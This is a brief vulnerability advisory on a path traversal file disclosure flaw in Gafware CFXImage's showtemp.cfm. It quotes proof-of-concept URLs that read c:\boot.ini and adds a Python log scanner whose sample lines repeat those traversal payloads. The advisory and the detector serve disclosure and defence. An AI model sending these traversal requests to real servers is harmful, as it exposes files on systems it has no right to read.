
Gafware CFXImage ShowTemp File Disclosure Vulnerability

The following proof of concept was provided by ProCheckup:

http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../../../../../../../../../../boot.ini

This allows the attacker to view the contents of 'c:\boot.ini'.
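
A log check for the request pattern shown above, added here as an example and not part of the original advisory or ProCheckup's material. It flags requests to showtemp.cfm whose FILE parameter is an absolute path or contains parent-directory segments; the log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed request lines as they might appear in an access log (not from the advisory).
SAMPLE_LOG = [
    'GET /docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini HTTP/1.0',
    'GET /docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../boot.ini HTTP/1.0',
    'GET /docs/showtemp.cfm?type=jpeg&file=%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.0',
    'GET /docs/showtemp.cfm?TYPE=JPEG&FILE=img_4821.jpg HTTP/1.0',
    'GET /docs/index.cfm?FILE=../x HTTP/1.0',
]

DRIVE = re.compile(r'^[a-zA-Z]:')   # absolute Windows path with a drive letter
ROOTED = re.compile(r'^[\\/]')      # UNC path or path rooted at the drive

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so the checks see the literal characters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_line):
    """Return a reason string if the request matches the advisory's pattern, else None."""
    parts = request_line.split(' ')
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if not url.path.lower().endswith('/showtemp.cfm'):
        return None
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() != 'file':       # parameter names are matched case-insensitively
            continue
        value = fully_decode(raw)
        if DRIVE.match(value):
            return 'absolute-path'
        if ROOTED.match(value):
            return 'rooted-path'
        if '..' in re.split(r'[\\/]', value):
            return 'traversal'
    return None

def scan(lines):
    """Return (line, reason) pairs for every request line that matches."""
    return [(line, reason) for line in lines if (reason := classify(line))]
```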







 

Copyright 2008, SecurityFocus